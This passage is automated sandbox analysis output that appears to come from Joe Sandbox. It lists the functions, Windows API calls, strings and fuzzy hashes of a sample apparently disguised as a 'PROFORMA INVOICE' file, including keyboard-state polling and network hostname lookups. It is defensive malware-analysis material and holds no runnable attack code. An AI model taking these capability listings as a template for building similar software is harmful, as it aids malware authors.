LoadStringW.USER32(00000000,?,00FD36F4,00000010), ref: 00FA25DD
_wprintf.LIBCMT ref: 00FA2610
__swprintf.LIBCMT ref: 00FA2632
MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00FA26A1

Strings

Error: , xrefs: 00FA266F
%s (%d) : ==> %s.: %s %s, xrefs: 00FA260B
Line %d:, xrefs: 00FA262C
., xrefs: 00FA2687
Line %d (File "%s"):, xrefs: 00FA2647

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: HandleLoadMessageModuleString__swprintf_wprintf
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 1080873982-4153970271
Opcode ID: 4d657413aefbbf63f0a05cb4b94ca93dc7ccf34655d251a43ecc5d9e2561b457
Instruction ID: cbab6e341474e66539189c6c0abbea14f9191a87d2d0f80a50b04d2c3ca78137
Opcode Fuzzy Hash: 4d657413aefbbf63f0a05cb4b94ca93dc7ccf34655d251a43ecc5d9e2561b457
Instruction Fuzzy Hash: D9217A3290021EAFCF11BF90CC4AEEE7B39BF19704F000459F5456A1A2EA79A619EB50

Function 00FA7AD9 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 73COMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00FA7B42
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00FA7B58
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00FA7B69
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00FA7B7B
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00FA7B8C

Strings

alias PlayMe, xrefs: 00FA7B1B
play PlayMe, xrefs: 00FA7B87
close PlayMe, xrefs: 00FA7B53, 00FA7B80
play PlayMe wait, xrefs: 00FA7B76
status PlayMe mode, xrefs: 00FA7B3D
open , xrefs: 00FA7AF1

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: SendString
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 890592661-1007645807
Opcode ID: 8dde3ce267a7ed3f5f707015698d860f1c47e750358cb8d8bdf68b4bcd1634f8
Instruction ID: 51fb3f6f560ea48e29a7c00548b2382efb5b245d474d54a68ac7a2e4caf3b028
Opcode Fuzzy Hash: 8dde3ce267a7ed3f5f707015698d860f1c47e750358cb8d8bdf68b4bcd1634f8
Instruction Fuzzy Hash: 2E11C4E1A4026979D730B3A2CC4ADFFBE7CFBD2B60F0005197491BF089DA641944D6B0

Function 00FA778F Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00FA7794

Part of subcall function 00F7DC38: timeGetTime.WINMM(?,75C0B400,00FD58AB), ref: 00F7DC3C

Sleep.KERNEL32(0000000A), ref: 00FA77C0
EnumThreadWindows.USER32(?,Function_00047744,00000000), ref: 00FA77E4
FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00FA7806
SetActiveWindow.USER32 ref: 00FA7825
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00FA7833
SendMessageW.USER32(00000010,00000000,00000000), ref: 00FA7852
Sleep.KERNEL32(000000FA), ref: 00FA785D
IsWindow.USER32 ref: 00FA7869
EndDialog.USER32(00000000), ref: 00FA787A

Strings

BUTTON, xrefs: 00FA77F8

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: 60441064b44f41d12591385cce5232ed2ef574f761603284e30df151ef458a4d
Instruction ID: 8927f0fc52fb139554fc72da6b22244854d03f7286aeb7cc34291db2c1f3cbef
Opcode Fuzzy Hash: 60441064b44f41d12591385cce5232ed2ef574f761603284e30df151ef458a4d
Instruction Fuzzy Hash: AA2130B1604349AFE7256F20ECC9F263F69FB4A758F244024F5468A666CB7E5C04FB21

Function 00FB02EE Relevance: 18.3, APIs: 12, Instructions: 282comCOMMON

Download Yara Rule

APIs

Part of subcall function 00F6936C: __swprintf.LIBCMT ref: 00F693AB
Part of subcall function 00F6936C: __itow.LIBCMT ref: 00F693DF

CoInitialize.OLE32(00000000), ref: 00FB034B
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00FB03DE
SHGetDesktopFolder.SHELL32(?), ref: 00FB03F2
CoCreateInstance.OLE32(00FEDA8C,00000000,00000001,01013CF8,?), ref: 00FB043E
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00FB04AD
CoTaskMemFree.OLE32(?,?), ref: 00FB0505
_memset.LIBCMT ref: 00FB0542
SHBrowseForFolderW.SHELL32(?), ref: 00FB057E
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00FB05A1
CoTaskMemFree.OLE32(00000000), ref: 00FB05A8
CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00FB05DF
CoUninitialize.OLE32(00000001,00000000), ref: 00FB05E1

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
String ID:
API String ID: 1246142700-0
Opcode ID: b411600961461da3568d7f44c31d3fbf56ebb4186f0a5dfb9212aa49a409a408
Instruction ID: d69b59d9ea03b0839283ecd9ef4df56694a1bde6e33ecf9d159280eeeef2c79d
Opcode Fuzzy Hash: b411600961461da3568d7f44c31d3fbf56ebb4186f0a5dfb9212aa49a409a408
Instruction Fuzzy Hash: 85B1D775A00209AFDB14DFA5CC88DAEBBB9EF48314B148469E806EB251DB74EE41DF50

Function 00FA2E5B Relevance: 18.2, APIs: 12, Instructions: 185keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00FA2ED6
SetKeyboardState.USER32(?), ref: 00FA2F41
GetAsyncKeyState.USER32(000000A0), ref: 00FA2F61
GetKeyState.USER32(000000A0), ref: 00FA2F78
GetAsyncKeyState.USER32(000000A1), ref: 00FA2FA7
GetKeyState.USER32(000000A1), ref: 00FA2FB8
GetAsyncKeyState.USER32(00000011), ref: 00FA2FE4
GetKeyState.USER32(00000011), ref: 00FA2FF2
GetAsyncKeyState.USER32(00000012), ref: 00FA301B
GetKeyState.USER32(00000012), ref: 00FA3029
GetAsyncKeyState.USER32(0000005B), ref: 00FA3052
GetKeyState.USER32(0000005B), ref: 00FA3060

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 509ae87a4c2f6f74715a8e86a23870fe4c28fa47103aefac3212150b3469e062
Instruction ID: 5760adca59624905a38570014ee6c0b8d85431fc9f87a31d2fe75156c4eb1ce5
Opcode Fuzzy Hash: 509ae87a4c2f6f74715a8e86a23870fe4c28fa47103aefac3212150b3469e062
Instruction Fuzzy Hash: A75108A0F047D829FB75DBB888407AABFB45F13354F08858DD5C25A1C2DB94AB8CE761

Function 00F9ED02 Relevance: 18.2, APIs: 12, Instructions: 174COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 00F9ED1E
GetWindowRect.USER32(00000000,?), ref: 00F9ED30
MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00F9ED8E
GetDlgItem.USER32(?,00000002), ref: 00F9ED99
GetWindowRect.USER32(00000000,?), ref: 00F9EDAB
MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00F9EE01
GetDlgItem.USER32(?,000003E9), ref: 00F9EE0F
GetWindowRect.USER32(00000000,?), ref: 00F9EE20
MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00F9EE63
GetDlgItem.USER32(?,000003EA), ref: 00F9EE71
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00F9EE8E
InvalidateRect.USER32(?,00000000,00000001), ref: 00F9EE9B

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: 90fdcabf201916941841873d5e02c3a50ea3e4a1394f93acf4b90ad4094a59e2
Instruction ID: 4cf0f7b03ec8ce7f92e288e4a424e845b1a10793c5af45da4cf426aee1293e56
Opcode Fuzzy Hash: 90fdcabf201916941841873d5e02c3a50ea3e4a1394f93acf4b90ad4094a59e2
Instruction Fuzzy Hash: A2512171B00209AFDF18DF69DD95AAEBBBAFB88710F14812DF919D7290D7709D049B10

Function 00F7B73E Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00F7B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00F7B759,?,00000000,?,?,?,?,00F7B72B,00000000,?), ref: 00F7BA58

DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00F7B72B), ref: 00F7B7F6
KillTimer.USER32(00000000,?,00000000,?,?,?,?,00F7B72B,00000000,?,?,00F7B2EF,?,?), ref: 00F7B88D
DestroyAcceleratorTable.USER32(00000000), ref: 00FDD8A6
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00F7B72B,00000000,?,?,00F7B2EF,?,?), ref: 00FDD8D7
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00F7B72B,00000000,?,?,00F7B2EF,?,?), ref: 00FDD8EE
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00F7B72B,00000000,?,?,00F7B2EF,?,?), ref: 00FDD90A
DeleteObject.GDI32(00000000), ref: 00FDD91C

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: eaa9f3f2993fda2aeea98e954b9a4661b0c01a6f7dd4ae42cc85a04c7a3e930b
Instruction ID: 27c752ae48a7b9e21ab039042da5d556fc1e9cf01b1b677bb130f4c5279c7e19
Opcode Fuzzy Hash: eaa9f3f2993fda2aeea98e954b9a4661b0c01a6f7dd4ae42cc85a04c7a3e930b
Instruction Fuzzy Hash: F461B431901704DFDB359F14D988B2977F6FF95321F29811EE08A4AA64C735A881FF42

Function 00F7B40A Relevance: 18.1, APIs: 12, Instructions: 131COMMON

Download Yara Rule

APIs

Part of subcall function 00F7B526: GetWindowLongW.USER32(?,000000EB), ref: 00F7B537

GetSysColor.USER32(0000000F), ref: 00F7B438

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: 307122242053084c91233e54f45b0d71c8f6f4f7abfabf9ada1c23b7de109498
Instruction ID: 499c3b48bb4cd044f2d835d5266d1bc1041477ad09cddd2bcbe16c24a370f947
Opcode Fuzzy Hash: 307122242053084c91233e54f45b0d71c8f6f4f7abfabf9ada1c23b7de109498
Instruction Fuzzy Hash: F141B431400154AFDF249F28DC89BB93B66EB46731F188262FD698E5E6D7348C41F722

Function 00FA690B Relevance: 18.1, APIs: 12, Instructions: 113COMMON

Download Yara Rule

APIs

_wcschr.LIBCMT ref: 00FA6923
_wcscpy.LIBCMT ref: 00FA6934
__wsplitpath.LIBCMT ref: 00FA6958
__wsplitpath.LIBCMT ref: 00FA6979
_wcscpy.LIBCMT ref: 00FA699B
_wcscpy.LIBCMT ref: 00FA69B9
_wcscpy.LIBCMT ref: 00FA69C7
_wcscat.LIBCMT ref: 00FA69D6
_wcscat.LIBCMT ref: 00FA6A2B
_wcscat.LIBCMT ref: 00FA6A61
_wcscat.LIBCMT ref: 00FA6A73

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
String ID:
API String ID: 136442275-0
Opcode ID: cfa1a4238b16b79a439e85f5909ab923519023ec5807928ce19288df2ac482e9
Instruction ID: f4612c61e176a8da501c285ca3d60eaac2110cbee2c2ce245ce954de4bb25616
Opcode Fuzzy Hash: cfa1a4238b16b79a439e85f5909ab923519023ec5807928ce19288df2ac482e9
Instruction Fuzzy Hash: 76414BB788511CAECFA1EB90CC42DDB73BCEB45310F4041A6B659E2051EE74ABE99F50

Function 00FAD76A Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 180COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(00FFDC00,00FFDC00,00FFDC00), ref: 00FAD7CE
GetDriveTypeW.KERNEL32(?,01013A70,00000061), ref: 00FAD898
_wcscpy.LIBCMT ref: 00FAD8C2

Strings

removable, xrefs: 00FAD800
all, xrefs: 00FAD7D4
ramdisk, xrefs: 00FAD842
fixed, xrefs: 00FAD816
cdrom, xrefs: 00FAD7EA
unknown, xrefs: 00FAD859
network, xrefs: 00FAD82C

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: BuffCharDriveLowerType_wcscpy
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2820617543-1000479233
Opcode ID: c1139eb0ef127b1b225792c28fcbda2639b82a1c823263fdb3876c05adb8b907
Instruction ID: a759f463447007cea82b32a220d16e754e5c4f7c33f1221b9604f0b8e63b8336
Opcode Fuzzy Hash: c1139eb0ef127b1b225792c28fcbda2639b82a1c823263fdb3876c05adb8b907
Instruction Fuzzy Hash: ED519175504304AFC700EF14CC82A6EB7A9FF85324F50881EF5AA5B6A2DB79DD05EA42

Function 00F6936C Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 145COMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 00F693AB
__itow.LIBCMT ref: 00F693DF

Part of subcall function 00F81557: _xtow@16.LIBCMT ref: 00F81578

Strings

False, xrefs: 00FD4C93
%.15g, xrefs: 00F693A5
0x%p, xrefs: 00FD4CAD
True, xrefs: 00FD4C8C

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: __itow__swprintf_xtow@16
String ID: %.15g$0x%p$False$True
API String ID: 1502193981-2263619337
Opcode ID: 1a36118cdd46037d1f0a598728fb4b8b91e34644cfc000b1eb8270fe8b89ef14
Instruction ID: ed935f04c60b116ef6561eb610bf2d89190c89a55ccf17d257085b1485122e2f
Opcode Fuzzy Hash: 1a36118cdd46037d1f0a598728fb4b8b91e34644cfc000b1eb8270fe8b89ef14
Instruction Fuzzy Hash: B241F432904204ABDB24EF74DD42FAA73EDEF44310F24446FE18AD7381EA76A941EB50

Function 00FCA1B6 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00FCA259
CreateCompatibleDC.GDI32(00000000), ref: 00FCA260
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00FCA273
SelectObject.GDI32(00000000,00000000), ref: 00FCA27B
GetPixel.GDI32(00000000,00000000,00000000), ref: 00FCA286
DeleteDC.GDI32(00000000), ref: 00FCA28F
GetWindowLongW.USER32(?,000000EC), ref: 00FCA299
SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00FCA2AD
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00FCA2B9

Strings

static, xrefs: 00FCA1F1

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: 6cb308c9a6cfea131b6541316e868744d0c41c98e7e9be9babe6f9fe861da062
Instruction ID: c3ebb9cd80e4a9035255200198ee81811a3f247f70831b5da0c12f388f1a689d
Opcode Fuzzy Hash: 6cb308c9a6cfea131b6541316e868744d0c41c98e7e9be9babe6f9fe861da062
Instruction Fuzzy Hash: E2319E31500119AFDF219FA4DD4AFEA3B69FF0D364F100219FA19AA0A0C735E811EBA5

Function 00FA6F02 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 72networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00FA6F1D
gethostname.WSOCK32(?,00000100), ref: 00FA6F37
gethostbyname.WSOCK32(?), ref: 00FA6F44
_wcscpy.LIBCMT ref: 00FA6F6C
inet_ntoa.WSOCK32(?), ref: 00FA6F8A
_strcat.LIBCMT ref: 00FA6F98
_wcscpy.LIBCMT ref: 00FA6FAF
WSACleanup.WSOCK32 ref: 00FA6FBD
_wcscpy.LIBCMT ref: 00FA6FCB

Strings

0.0.0.0, xrefs: 00FA6F66

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: _wcscpy$CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 2620052-3771769585
Opcode ID: 9c333c9f2aeef0f5ec72f23c847a69416c7b87d5089b15ac8ab37550c4666659
Instruction ID: f6aa96745bce3ed8e229bf744c54755d43604e2ba619af6fe5281c7ab5a39ed9
Opcode Fuzzy Hash: 9c333c9f2aeef0f5ec72f23c847a69416c7b87d5089b15ac8ab37550c4666659
Instruction Fuzzy Hash: 2E11E772904119AFCB246B60EC4AEDA77ACEF45720F080065F145DA091FF74EA85A751

Function 00F8500E Relevance: 16.8, APIs: 11, Instructions: 257COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00F85047

Part of subcall function 00F87C0E: __getptd_noexit.LIBCMT ref: 00F87C0E

__gmtime64_s.LIBCMT ref: 00F850E0
__gmtime64_s.LIBCMT ref: 00F85116
__gmtime64_s.LIBCMT ref: 00F85133
__allrem.LIBCMT ref: 00F85189
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F851A5
__allrem.LIBCMT ref: 00F851BC
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F851DA
__allrem.LIBCMT ref: 00F851F1
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F8520F
__invoke_watson.LIBCMT ref: 00F85280

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
Instruction ID: 3d3939b94f5b36e8f45ab6d6d4a815f2fbb38014df6db323ceaf6cb23e6da2e1
Opcode Fuzzy Hash: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
Instruction Fuzzy Hash: FE71C772E01F17ABEB14BE68CC81BEA73A8BF00B64F144239F510D6281EB74D940A7D0

Function 00FA4DDD Relevance: 16.7, APIs: 11, Instructions: 189windowsleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00FA4DF8
GetMenuItemInfoW.USER32(01021708,000000FF,00000000,00000030), ref: 00FA4E59
SetMenuItemInfoW.USER32(01021708,00000004,00000000,00000030), ref: 00FA4E8F
Sleep.KERNEL32(000001F4), ref: 00FA4EA1
GetMenuItemCount.USER32(?), ref: 00FA4EE5
GetMenuItemID.USER32(?,00000000), ref: 00FA4F01
GetMenuItemID.USER32(?,-00000001), ref: 00FA4F2B
GetMenuItemID.USER32(?,?), ref: 00FA4F70
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00FA4FB6
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00FA4FCA
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00FA4FEB

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

